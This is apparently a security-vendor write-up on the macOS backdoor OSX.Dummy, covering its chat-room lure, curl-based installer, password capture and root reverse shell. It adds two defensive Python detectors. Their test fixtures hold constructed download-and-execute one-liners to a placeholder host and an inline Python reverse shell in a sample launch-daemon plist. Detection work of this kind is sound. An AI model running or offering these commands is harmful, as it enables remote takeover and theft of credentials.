
OSX.Dummy

Posted: April 14, 2020

OSX.Dummy is a backdoor Trojan that lets a threat actor control an infected Mac remotely. Its campaign targets victims through cryptocurrency-themed chat rooms and channels and tricks them into pasting a terminal command that installs the Trojan. Users should let their anti-malware products delete OSX.Dummy as soon as possible, change any passwords that may have been compromised, and avoid entering terminal commands without fully understanding what they do.

Who's the Dummy in this Computer-Hijacking Situation

Con artists come in more flavors than the goods-hawking vendors of a street market. Anyone working in cryptocurrency should already know how closely financial technology and such cons are related. For those who need a concrete demonstration, the backdoor Trojan OSX.Dummy provides one.

The 'origin story' of OSX.Dummy involves a threat actor striking up conversations on chat platforms like Discord and Slack. The con artist proposes a cryptocurrency transaction, such as a Bitcoin purchase, and asks the victim to 'make sure the port is open' for the transfer. Since port settings are a frequent obstacle for programs that need network access, including recreational software like video games, the line is somewhat believable.

However, the terminal command the threat actor hands over to be copied and pasted doesn't open a port. It downloads a file with curl and runs it, prompting for the user's password along the way. No exploit is involved: Gatekeeper and XProtect act on files that carry the quarantine attribute browsers set on downloads, and curl sets no such attribute, so an unsigned binary fetched this way runs without either check. OSX.Dummy gains persistence shortly afterward and makes the Mac into a 'dummy' that the attacker can control through remote commands.
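The lure works because the pasted command and the claimed purpose have nothing to do with each other. The following is an added example, not code from the original article, showing how a one-liner can be triaged before it is run: it splits the command into pipelines and stages, records what is fetched from the network and what is executed, and compares that against the tools a genuine macOS firewall change would call (`pfctl`, `socketfilterfw`; that allow-list is an assumption). The sample commands are constructed and `payload.example.invalid` is a placeholder host, not a real indicator.

```python
"""Triage a pasted shell one-liner: does it do what the sender says it does?

Added example, not code from the original article. The sample one-liners are
constructed; 'payload.example.invalid' is a placeholder host, not an indicator.
"""
import os
import re
import shlex

DOWNLOADERS = {"curl", "wget"}
# Interpreters that run whatever is piped into them or passed as a file.
INTERPRETERS = {"sh", "bash", "zsh", "python", "python3", "perl", "osascript"}
# What a genuine "open a port" instruction on macOS would plausibly call
# (pf and the application firewall). Assumption: extend for your environment.
FIREWALL_TOOLS = {"pfctl", "socketfilterfw"}


def output_files(tokens):
    """Files a curl/wget stage writes: shell redirection or -o/-O/--output.

    (curl -O takes no argument; the URL basename it would save as happens to
    be what we record, so the approximation is good enough for triage.)
    """
    files = set()
    for i, tok in enumerate(tokens):
        if tok in (">", ">>", "-o", "-O", "--output") and i + 1 < len(tokens):
            files.add(os.path.basename(tokens[i + 1]))
        elif tok.startswith((">", "--output=")) and tok not in (">", ">>"):
            files.add(os.path.basename(tok.lstrip(">").split("=", 1)[-1]))
    return files


def analyze(line):
    """Walk each pipeline of the one-liner and record what it fetches and runs."""
    f = {"downloaded": set(), "executed": set(), "piped_to_interpreter": False,
         "firewall_tool": False, "sudo": False}
    for pipeline in re.split(r"\s*(?:&&|\|\||;)\s*", line.strip()):
        saw_downloader = False
        for stage in re.split(r"\s*\|\s*", pipeline):
            try:
                tokens = shlex.split(stage)
            except ValueError:  # unbalanced quotes: fall back to whitespace split
                tokens = stage.split()
            if tokens and tokens[0] == "sudo":
                f["sudo"] = True
                tokens = tokens[1:]
            if not tokens:
                continue
            prog = os.path.basename(tokens[0])
            if prog in FIREWALL_TOOLS:
                f["firewall_tool"] = True
            elif prog in DOWNLOADERS:
                saw_downloader = True
                f["downloaded"] |= output_files(tokens)
            elif prog in INTERPRETERS:
                if saw_downloader:
                    f["piped_to_interpreter"] = True  # curl ... | bash
                # "bash script" / "python payload.py" on a file fetched earlier
                f["executed"] |= {os.path.basename(a) for a in tokens[1:]} & f["downloaded"]
            elif prog in f["downloaded"]:
                f["executed"].add(prog)  # ./script run directly after chmod +x
    return f


def verdict(line):
    """One-word classification a user can compare against the sender's claim."""
    f = analyze(line)
    if f["piped_to_interpreter"] or f["executed"]:
        return "DOWNLOAD-AND-EXECUTE"
    if f["downloaded"]:
        return "DOWNLOADS-FILE"
    if f["firewall_tool"]:
        return "FIREWALL-CHANGE"
    return "NO-NETWORK-FETCH"


# Constructed samples; the first two imitate the shape of the lure described
# in the article without reproducing its real URL or payload.
SAMPLES = {
    "lure": "cd /tmp && curl -s http://payload.example.invalid/script > script "
            "&& chmod +x script && sudo ./script",
    "pipe": "curl -fsSL https://payload.example.invalid/install.sh | sudo bash",
    "firewall": "sudo /usr/libexec/ApplicationFirewall/socketfilterfw "
                "--add /Applications/Wallet.app",
    "benign": "ls -la ~/Downloads",
}

if __name__ == "__main__":
    for name, cmd in SAMPLES.items():
        print(f"{name:9s} {verdict(cmd):22s} {cmd}")
```

Anything classified as DOWNLOAD-AND-EXECUTE while the sender talks about ports is the mismatch the article warns about; the `sudo` flag additionally tells you the pasted command will ask for the account password, which is exactly how the installer got hold of it.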

Smartening Up against Chatty Robbers

OSX.Dummy is a threat of great self-contradiction. Because it is statically linked, the first-stage download is over thirty megabytes. Yet malware analysts deem the Trojan itself surprisingly limited in functionality. It persists as a launch daemon that runs as root, captures the password the user types at the sudo prompt during installation, and gives the attacker a reverse shell for issuing commands, but it has no notable features beyond that.
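The combination the paragraph describes, a launch daemon that starts at boot and keeps a reverse shell alive, is something a responder can hunt for in `/Library/LaunchDaemons` and `/Library/LaunchAgents`. The following is an added example, not code from the original article or from any analysis of OSX.Dummy: it parses launchd property lists and flags jobs that run from unusual paths, carry inline interpreter code with reverse-shell primitives, and are configured to restart whenever killed. The two property lists are constructed (placeholder label and paths, RFC 5737 documentation address), and the heuristics are the editor's assumptions, not published indicators.

```python
"""Triage launchd property lists for backdoor-style persistence.

Added example, not code from the original article. The plists below are
constructed to illustrate the pattern described in the text (a root launch
daemon that keeps a reverse shell alive); label, paths and address are
placeholders. The heuristics are assumptions, not published indicators.
"""
import os
import plistlib

# Locations a legitimate system daemon is unlikely to execute from (assumption).
UNUSUAL_DIRS = ("/tmp/", "/private/tmp/", "/var/tmp/", "/var/root/", "/Users/Shared/")
INTERPRETERS = {"python", "python3", "perl", "ruby", "sh", "bash", "zsh"}
# Primitives an inline reverse shell needs: a socket, a connect, and stdio
# duplicated onto it before a shell is spawned.
REVERSE_SHELL_HINTS = ("socket(", "connect(", "dup2(", "/dev/tcp/", "pty.spawn")


def triage(plist_bytes):
    """Return the reasons a launchd job looks like a planted backdoor ([] if none)."""
    job = plistlib.loads(plist_bytes)
    args = job.get("ProgramArguments") or ([job["Program"]] if "Program" in job else [])
    if not args:
        return []
    reasons = []
    prog = args[0]
    if prog.startswith(UNUSUAL_DIRS) or prog.endswith(".sh"):
        reasons.append(f"program runs from an unusual path: {prog}")
    if os.path.basename(prog) in INTERPRETERS:
        inline = " ".join(args[1:])
        hits = [h for h in REVERSE_SHELL_HINTS if h in inline]
        if len(hits) >= 2:
            reasons.append("inline interpreter code with reverse-shell primitives: "
                           + ", ".join(hits))
    # Restart-on-exit is common for benign daemons too, so only count it as
    # aggravating once something else already looks wrong.
    if reasons and job.get("RunAtLoad") and job.get("KeepAlive"):
        reasons.append("RunAtLoad + KeepAlive: starts at boot and is restarted if killed")
    return reasons


PLIST_HEAD = (b'<?xml version="1.0" encoding="UTF-8"?>\n'
              b'<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" '
              b'"http://www.apple.com/DTDs/PropertyList-1.0.dtd">\n<plist version="1.0">')

# Constructed: interpreter launched with an inline reverse shell to a
# documentation address, kept alive by launchd.
BACKDOOR_PLIST = PLIST_HEAD + b"""<dict>
  <key>Label</key><string>com.example.startup</string>
  <key>ProgramArguments</key><array>
    <string>/usr/bin/python</string>
    <string>-c</string>
    <string>import socket,subprocess,os;s=socket.socket();s.connect(("192.0.2.10",4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];subprocess.call(["/bin/sh","-i"])</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict></plist>"""

# Constructed: a root-owned shell script in an unusual place doing the same job.
SCRIPT_PLIST = PLIST_HEAD + b"""<dict>
  <key>Label</key><string>com.example.helper</string>
  <key>ProgramArguments</key><array><string>/var/root/helper.sh</string></array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict></plist>"""

# Constructed: an ordinary system-style daemon that should not be flagged.
BENIGN_PLIST = PLIST_HEAD + b"""<dict>
  <key>Label</key><string>com.example.agent</string>
  <key>ProgramArguments</key><array>
    <string>/usr/libexec/example-helper</string><string>--daemon</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict></plist>"""

if __name__ == "__main__":
    for name, data in (("backdoor", BACKDOOR_PLIST), ("script", SCRIPT_PLIST),
                       ("benign", BENIGN_PLIST)):
        print(name, triage(data) or "clean")
```

On a live system, feed `triage()` the bytes of every file under the two launchd directories and review anything it returns; a script-only hit (the `SCRIPT_PLIST` case) still needs the referenced script read, since that is where a reverse shell like the one the article describes would live.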

Still, a reverse shell running as root is enough for a sufficiently cunning attacker to deliver other threats, delete files, change settings or collect information. The last is most probably OSX.Dummy's goal, since its victims are cryptocurrency users. This demographic offers a self-evident monetization path for threat actors who can collect wallet credentials, along with their contents.

Users of all operating systems should familiarize themselves with what a command does before entering it into a terminal or command prompt.

The command victims type before infecting themselves doesn't resemble one for opening a port or interacting with firewall software or related settings. When users trust strangers about what unknown words mean to their computers, it seems only fitting that those 'magic words' turn out to be a hex with less than happy consequences, like the backdoor Trojan OSX.Dummy.
